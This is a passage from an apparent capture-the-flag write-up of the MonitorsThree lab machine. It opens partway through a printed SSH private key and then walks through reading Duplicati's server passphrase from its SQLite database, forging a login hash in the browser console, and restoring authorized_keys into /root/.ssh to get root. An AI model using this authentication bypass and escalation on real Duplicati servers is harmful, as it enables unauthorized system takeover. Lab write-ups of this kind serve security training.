KCZMUCYtHxtqElprLH8KsGOBVsOdbDSAC20iFd1CJc/P97nzdM5geFh2nEvpO4Tj/6yfBo
8YoU4Zoej8wtEW6Q/8Aggrxdal/gavMXO+/e8QUeCnz2gPToAdLrxLs1VnKDGCCOkL850N
RRKyZzonHiaMUa5dPOuiZjn+pqD+ulEZWuftLC7Wu/evgEQzTENoOIHoed6Y2t52WKtkAI
tW+uhiEZmFBs+Llrp0SfupFL3+0FZjYJppxdnFWBaXZQafFgDGdl8nqoU5IWeH4OpsD8kH
5aExWMcNY7/ehfisOBE9bUy/jy0C9GKR4EU3pZAigcaOPzYhrOi0xM7LnMqg3nZHuaP+cX
CBp1P5E7cLecV2TKpqI1zssH++76Jgrix33Mnj39r8CJhfRa7NO5aN6bO6SoqX+XEOMGDe
VeyPoRXInuafXnhvvaL3cO0Oqqw++wAAAAMBAAEAAAGAAxIKAEaO9xZnRrjh0INYCA8sBP
UdlPWmX9KBrTo4shGXYqytDCOUpq738zginrfiDDtO5Do4oVqN/a83X/ibBQuC0HaC0NDA
HvLQy0D4YQ6/8wE0K8MFqKUHpE2VQJvTLFl7UZ4dVkAv4JhYStnM1ZbVt5kNyQzIn1T030
zAwVsn0tmQYsTHWPSrYgd3+36zDnAJt+koefv3xsmhnYEZwruXTZYW0EKqLuKpem7algzS
Dkykbe/YupujChCK0u5KY2JL9a+YDQn7mberAY31KPAyOB66ba60FUgwECw0J4eTLMjeEA
bppHadb5vQKH2ZhebpQlTiLEs2h9h9cwuW4GrJl3vcVqV68ECGwqr7/7OvlmyUgzJFh0+8
/MFEq8iQ0VY4as4y88aMCuqDTT1x6Zqg1c8DuBeZkbvRDnU6IJ/qstLGfKmxg6s+VXpKlB
iYckHk0TAs6FDngfxiRHvIAh8Xm+ke4ZGh59WJyPHGJ/6yh3ie7Eh+5h/fm8QRrmOpAAAA
wHvDgC5gVw+pMpXUT99Xx6pFKU3M1oYxkhh29WhmlZgvtejLnr2qjpK9+YENfERZrh0mv0
GgruxPPkgEtY+MBxr6ycuiWHDX/xFX+ioN2KN2djMqqrUFqrOFYlp8DG6FCJRbs//sRMhJ
bwi2Iob2vuHV8rDhmRRq12iEHvWEL6wBhcpFYpVk+R7XZ5G4uylCzs27K9bUEW7iduys5a
ePG4B4U5NV3mDhdJBYtbuvwFdL7J+eD8rplhdQ3ICwFNC1uQAAAMEA03BUDMSJG6AuE6f5
U7UIb+k/QmCzphZ82az3Wa4mo3qAqulBkWQn65fVO+4fKY0YwIH99puaEn2OKzAGqH1hj2
y7xTo2s8fvepCx+MWL9D3R9y+daUeH1dBdxjUE2gosC+64gA2iF0VZ5qDZyq4ShKE0A+Wq
4sTOk1lxZI4pVbNhmCMyjbJ5fnWYbd8Z5MwlqmlVNzZuC+LQlKpKhPBbcECZ6Dhhk5Pskh
316YytN50Ds9f+ueqxGLyqY1rHiMrDAAAAwQDN4jV+izw84eQ86/8Pp3OnoNjzxpvsmfMP
BwoTYySkRgDFLkh/hzw04Q9551qKHfU9/jBg9BH1cAyZ5rV/9oLjdEP7EiOhncw6RkRRsb
e8yphoQ7OzTZ0114YRKdafVoDeb0twpV929S3I1Jxzj+atDnokrb8/uaPvUJo2B0eDOc7T
z6ZnzxAqKz1tUUcqYYxkCazMN+0Wx1qtallhnLjy+YaExM+uMHngJvVs9zJ2iFdrpBm/bt
PA4EYA8sgHR2kAAAAUbWFyY3VzQG1vbml0b3JzdGhyZWUBAgMEBQYH
-----END OPENSSH PRIVATE KEY-----
```

{% endtab %}
{% endtabs %}

Copy and paste the ***id\_rsa*** into local machine file and change the **permissions**.

```bash
chmod 600 id_rsa

ssh -i id_rsa marcus@10.10.11.30
Last login: Tue Aug 20 11:34:00 2024
marcus@monitorsthree:~$
```

{% hint style="info" %}
The user.txt file contains the user flag :clap:
{% endhint %}

### Pillaging - marcus \[user]

The marcus user is running the **duplicati** service in port **8200**.&#x20;

**Duplicati** is a free, open-source backup client that securely stores encrypted, incremental, and compressed backups on cloud storage services and remote file servers.

```bash
marcus@monitorsthree:~$ netstat -tlnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:8084            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:44967         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8200          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -  

marcus@monitorsthree:~$ wget http://127.0.0.1:8200
--2025-01-15 03:50:11--  http://127.0.0.1:8200/
Connecting to 127.0.0.1:8200... connected.
HTTP request sent, awaiting response... 302 Redirect
Location: /login.html [following]
--2025-01-15 03:50:11--  http://127.0.0.1:8200/login.html
Reusing existing connection to 127.0.0.1:8200.
HTTP request sent, awaiting response... 200 OK
Length: 1239 (1.2K) [text/html]
Saving to: ‘index.html’

index.html                                  100%[========================================================================================>]   1.21K  --.-KB/s    in 0.04s   

2025-01-15 03:50:11 (30.0 KB/s) - ‘index.html’ saved [1239/1239]

marcus@monitorsthree:~$ cat index.html
```

```html
<!doctype html>
<html>
<head>
    <meta charset="utf-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    
    <title>Duplicati Login</title>
    
    <script type="text/javascript" src="login/jquery-2.0.3.min.js"></script>
    <script type="text/javascript" src="login/cryptojs.js"></script>
    <script type="text/javascript" src="login/login.js?v=2.0.8.1"></script>
    <link rel="stylesheet" type="text/css" href="login/login.css?v=2.0.8.1" />

    <script type="text/javascript" src="oem/root/login/oem.js?v=2.0.8.1" ></script>
    <link rel="stylesheet" type="text/css" href="oem/root/login/oem.css?v=2.0.8.1" />
</head>

<body>
    <div id="login">
        <h2>Duplicati</h2>
        <form method="POST">
            <fieldset>

                <p><label for="login-password">Password</label></p>
                <p><input type="password" id="login-password" value="password" onBlur="if(this.value=='')this.value='password'" onFocus="if(this.value=='password')this.value=''" autofocus></p> <!-- JS because of IE support; better: placeholder="password" -->

                <p><input type="submit" id="login-button" value="Sign In"></p>

            </fieldset>
        </form>
    </div>
</body>    
</html>
```

Searching the **duplicti** folder leads us to **config** folder which contains the ***Duplaciti-server.sqlite*** file.

```bash
marcus@monitorsthree:~$ cd /
marcus@monitorsthree:/$ find -type d -name duplicati 2>/dev/null
./opt/duplicati
marcus@monitorsthree:/$ cd /opt/duplicati
marcus@monitorsthree:/opt/duplicati$ ls
config
marcus@monitorsthree:/opt/duplicati$ cd config
marcus@monitorsthree:/opt/duplicati/config$ ls
control_dir_v2  CTADPNHLTC.sqlite  Duplicati-server.sqlite
marcus@monitorsthree:/opt/duplicati/config$ 
```

Downloading the ***Duplicati-server.sqlite*** using **`scp`** and enumearting it using **`sqlite3`**.

```bash
scp -i id_rsa marcus@10.10.11.30:/opt/duplicati/config/Duplicati-server.sqlite .
```

```bash
sqlite3 Duplicati-server.sqlite
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
Backup        Log           Option        TempFile    
ErrorLog      Metadata      Schedule      UIStorage   
Filter        Notification  Source        Version     
```

### Exploit - Duplicati Login Authentication Bypass with server-passphrase

The **duplicati** is vulnerable to login authentication using server-passphrase. The below post shows us the **PoC** for **duplicati** login bypass using server-passphrase.

{% embed url="<https://medium.com/@STarXT/duplicati-bypassing-login-authentication-with-server-passphrase-024d6991e9ee>" %}

* **Port Forward** the 8200 port via **`ssh`**.

```bash
ssh -i id_rsa -L 8200:localhost:8200 marcus@10.10.11.30
```

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2F7H7qYgXr0qm5LQ5k9fxm%2Fduplicati_login.png?alt=media&#x26;token=c80f7857-4e71-46d2-984e-0eaf66ffa412" alt=""><figcaption></figcaption></figure>

* The ***Duplicati-server.sqlite*** contains the **server-passphare** in **Option** table.

```bash
sqlite> SELECT * FROM Option;
4||encryption-module|
4||compression-module|zip
4||dblock-size|50mb
4||--no-encryption|true
-1||--asynchronous-upload-limit|50
-1||--asynchronous-concurrent-upload-limit|50
-2||startup-delay|0s
-2||max-download-speed|
-2||max-upload-speed|
-2||thread-priority|
-2||last-webserver-port|8200
-2||is-first-run|
-2||server-port-changed|True
-2||server-passphrase|Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=
-2||server-passphrase-salt|xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I=
-2||server-passphrase-trayicon|5e7d1ded-124e-4139-af7b-1b4b40026a0f
-2||server-passphrase-trayicon-hash|yU1y7roWxv5XAV8DzSRBJLC47Re67GycGbvuqn2XDvo=
-2||last-update-check|638724745250801590
-2||update-check-interval|
-2||update-check-latest|
-2||unacked-error|False
-2||unacked-warning|False
-2||server-listen-interface|any
-2||server-ssl-certificate|
-2||has-fixed-invalid-backup-id|True
-2||update-channel|
-2||usage-reporter-level|
-2||has-asked-for-password-protection|true
-2||disable-tray-icon-login|false
-2||allowed-hostnames|*
sqlite> 
```

* The &#x6C;***ogin.js*** has a **login logic**. It can be used to **craft** the **password** and authenticate our-self.

```javascript
var saltedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Utf8.parse($('#login-password').val()) + CryptoJS.enc.Base64.parse(data.Salt)));
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse(data.Nonce) + saltedpwd)).toString(CryptoJS.enc.Base64);
```

{% hint style="info" %}
The salt value is converted into base64 and then into hexdecimal.
{% endhint %}

* Intercept the duplicati login request using **`burpsuite`**.  Don't forward the ***login.cgi*** POST request with password parameter and get the **nounce**. The **salt** also matches with the **duplicati database**.

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2FCQhPkLlFZOs3qznDma7l%2Fsalt-value-match.png?alt=media&#x26;token=acb7b42a-5f17-4936-a05b-51ea4ea46ef9" alt=""><figcaption></figcaption></figure>

* Convert the server-passphrase value into **`base64`** and then into hexadecimal.

```bash
echo Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho= | base64 -d | xxd -p -c 128
59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a
```

* Once we get the above hex we can generate the valid password using above hex and nounce.
* Open the **dev-tool** console and paste the below code.

```javascript
var saltedpwd = '59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a'; 
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('FDes7AvOEeG0FvjYjZRI2Cn0NojhpthKsIuxvsbzF+I=') + saltedpwd)).toString(CryptoJS.enc.Base64);
console.log(noncedpwd);
```

* Copy the printed string in console and paste it into password paramater. URL encode the password by pressing **`Ctrl`** + **`U`** then forward the request.

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2FCYcYwSOf2Ba5jCTOLPxT%2Fduplicati-valid-password.png?alt=media&#x26;token=1113a852-b24c-43a9-bfea-a956de894807" alt=""><figcaption></figcaption></figure>

* If successful we will get the **duplicati** index page or we will get the authentication fail alter.
*

```
<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2F3FPVBTZnJ8PVLtPtPru0%2Fduplicati_dashboard.png?alt=media&#x26;token=b1d96bec-218c-4c13-a3f6-3e144c8d66af" alt=""><figcaption></figcaption></figure>
```

### Shell - root

The accessed duplicati can be used to copy the content of the system and restore it into marcus home directory or vice-versa. I tried backing up the ***id\_rsa*** of root user but it was not present. The marcus has a ***authorized\_keys*** file in  ***/home/marcus/.ssh*** directory which we can backup and restore it into ***/root/.ssh*** directory and we can ssh into root from marus.

* Create the backup of ***authorized\_keys*** and restore it into the ***/root/.ssh*** directory.

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2FDF8gRH8wBLO4CCR4rLO2%2Fbackup.gif?alt=media&#x26;token=fb5e51a5-b2ad-4b18-b6be-a9e1bd237359" alt=""><figcaption><p>Creating Backup</p></figcaption></figure>

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2FyN0fgJZjiuohM5JNMp0g%2Frestore.gif?alt=media&#x26;token=49be39c3-c79b-434e-954b-56b9e70bb42d" alt=""><figcaption><p>Restoring backup</p></figcaption></figure>

```bash
marcus@monitorsthree:~$ ssh root@10.10.11.30
The authenticity of host '10.10.11.30 (10.10.11.30)' can't be established.
ED25519 key fingerprint is SHA256:1llzaKeglum8R0dawipiv9mSGU33yzoUW3frO9MAF6U.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.30' (ED25519) to the list of known hosts.
Last login: Tue Aug 20 15:21:21 2024
root@monitorsthree:~# 
```

{% hint style="info" %}
The root.txt file contains the root flag :tada:
{% endhint %}

## Proof of Concept

The below video provides the **PoC** of MonitorsThree machine.

{% embed url="<https://odysee.com/@runasdexter:a/monitorsthree:5>" %}